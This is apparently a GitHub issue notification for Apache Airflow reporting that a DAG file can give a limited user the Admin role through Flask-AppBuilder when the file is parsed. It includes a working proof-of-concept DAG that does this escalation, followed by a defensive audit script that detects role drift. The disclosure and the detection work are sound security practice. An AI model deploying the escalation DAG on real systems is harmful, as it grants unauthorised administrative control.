rssanders3 opened a new issue #18643:
URL: https://github.com/apache/airflow/issues/18643
### Apache Airflow version
2.0.2
### Operating System
CentOS
### Versions of Apache Airflow Providers
N/A
### Deployment
Virtualenv installation
### Deployment details
Installation of Apache Airflow is running on Virtual Machines and configured
with LDAP Authentication:
```ini
authenticate = True
auth_backend = airflow.contrib.auth.backends.ldap_auth
```
### What happened
While performing a security review of Apache Airflow, the Team appears to
have discovered a security hole where users can update their own RBAC role or
the roles of someone else on their team by using the Flask Appbuilder within a
DAG definition.
### What you expected to happen
I would hope that users would not be able to update their Roles for security
purposes.
### How to reproduce
1. Create a new user with limited permissions (in the example the username is
"test-user")
2. Deploy the following DAG:
```python
from datetime import timedelta

from airflow.models import DAG
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils.dates import days_ago
from airflow.www.app import cached_app

# Everything at module level runs whenever the DAG file is parsed, i.e. under
# the scheduler / DAG processor with the metadata-database credentials.
# The Flask-AppBuilder security manager is reachable from there, so the
# role change below happens at parse time, before any task is scheduled.
appbuilder = cached_app().appbuilder

user = appbuilder.sm.find_user(username='test-user')
print(user)
print(user.roles)

# Grant the limited user the built-in Admin role if it does not have it yet.
role = appbuilder.sm.find_role('Admin')
if role not in user.roles:
    user.roles.append(role)

default_args = {
    'owner': 'Airflow',
    'start_date': days_ago(1),
}

# The DAG itself is a placeholder; it only exists so the file is picked up
# and parsed.
dag = DAG(
    dag_id='appbuilder-test',
    default_args=default_args,
    schedule_interval=None,
    dagrun_timeout=timedelta(60),
)

start_task = DummyOperator(task_id="start", dag=dag)
```
3. Open the Airflow Webserver as the Admin user and see that the "test-user"
now has the "Admin" role assigned
### Anything else
Confirmed that this is an issue with other versions of Apache Airflow 2.x,
including the latest stable release: 2.1.4.
### Are you willing to submit PR?
- [X] Yes I am willing to submit a PR!
### Code of Conduct
- [X] I agree to follow this project's [Code of
Conduct](https://github.com/apache/airflow/blob/main/CODE_OF_CONDUCT.md)
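Because a DAG file such as the one in the reproduction above can rewrite role assignments directly in the metadata database, an operator who cannot yet prevent that wants at least to notice it. The following audit is an added example and not code from the issue or from the Airflow project. It models a constructed subset of the Flask-AppBuilder tables Airflow's RBAC is stored in (`ab_user`, `ab_role`, `ab_user_role`) in an in-memory SQLite database, seeds it with constructed rows in which "test-user" has picked up Admin, and diffs the live role sets against a hypothetical provisioning baseline (`BASELINE`); the column subset and the baseline are assumptions of the example, and a real run would connect to the metadata database instead of `open_sample_db()`.

```python
import sqlite3
from typing import Dict, Set, Tuple

# Constructed subset of the Flask-AppBuilder tables Airflow's RBAC lives in
# (ab_user, ab_role, ab_user_role). Only the columns the audit needs are
# modelled; against a real deployment, replace open_sample_db() with a
# connection to the metadata database.
SCHEMA = """
CREATE TABLE ab_user (id INTEGER PRIMARY KEY, username TEXT NOT NULL UNIQUE);
CREATE TABLE ab_role (id INTEGER PRIMARY KEY, name TEXT NOT NULL UNIQUE);
CREATE TABLE ab_user_role (
    id INTEGER PRIMARY KEY,
    user_id INTEGER NOT NULL REFERENCES ab_user(id),
    role_id INTEGER NOT NULL REFERENCES ab_role(id)
);
"""

# Constructed sample state: "test-user" was provisioned as a Viewer, but a
# DAG file has since appended Admin, as in the reproduction above.
SAMPLE_ROWS = {
    "ab_user": [(1, "admin"), (2, "test-user"), (3, "analyst")],
    "ab_role": [(1, "Admin"), (2, "Viewer"), (3, "Op")],
    "ab_user_role": [(1, 1, 1), (2, 2, 2), (3, 2, 1), (4, 3, 3)],
}

# Hypothetical baseline: the role set each account is supposed to hold, as
# recorded at provisioning time (for example from an LDAP group mapping).
BASELINE = {
    "admin": {"Admin"},
    "test-user": {"Viewer"},
    "analyst": {"Viewer"},
}


def open_sample_db() -> sqlite3.Connection:
    """Build the in-memory sample database from the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, rows in SAMPLE_ROWS.items():
        placeholders = ",".join("?" * len(rows[0]))
        conn.executemany(f"INSERT INTO {table} VALUES ({placeholders})", rows)
    conn.commit()
    return conn


def current_roles(conn: sqlite3.Connection) -> Dict[str, Set[str]]:
    """Map every username to the set of role names it currently holds."""
    roles = {u: set() for (u,) in conn.execute("SELECT username FROM ab_user")}
    query = """
        SELECT u.username, r.name
        FROM ab_user_role ur
        JOIN ab_user u ON u.id = ur.user_id
        JOIN ab_role r ON r.id = ur.role_id
    """
    for username, role in conn.execute(query):
        roles[username].add(role)
    return roles


def role_drift(conn: sqlite3.Connection,
               baseline: Dict[str, Set[str]]) -> Dict[str, Tuple[Set[str], Set[str]]]:
    """Return {username: (roles gained, roles lost)} for every account whose
    live role set differs from the baseline. An account present in the DB
    but absent from the baseline is reported with all its roles as gained."""
    drift = {}
    for username, live in current_roles(conn).items():
        expected = baseline.get(username, set())
        gained, lost = live - expected, expected - live
        if gained or lost:
            drift[username] = (gained, lost)
    return drift


def unexpected_admins(conn: sqlite3.Connection,
                      baseline: Dict[str, Set[str]]) -> Set[str]:
    """Usernames that hold Admin without the baseline granting it."""
    return {user for user, (gained, _) in role_drift(conn, baseline).items()
            if "Admin" in gained}


if __name__ == "__main__":
    conn = open_sample_db()
    for user, (gained, lost) in sorted(role_drift(conn, BASELINE).items()):
        print(f"{user}: gained={sorted(gained)} lost={sorted(lost)}")
    print("unexpected admins:", sorted(unexpected_admins(conn, BASELINE)))
```

Run periodically, this only catches an escalation after it has happened; the root cause the issue describes is that DAG files execute with the metadata-database credentials, so the durable control is limiting who can place files in the DAGs folder, not a query.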
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]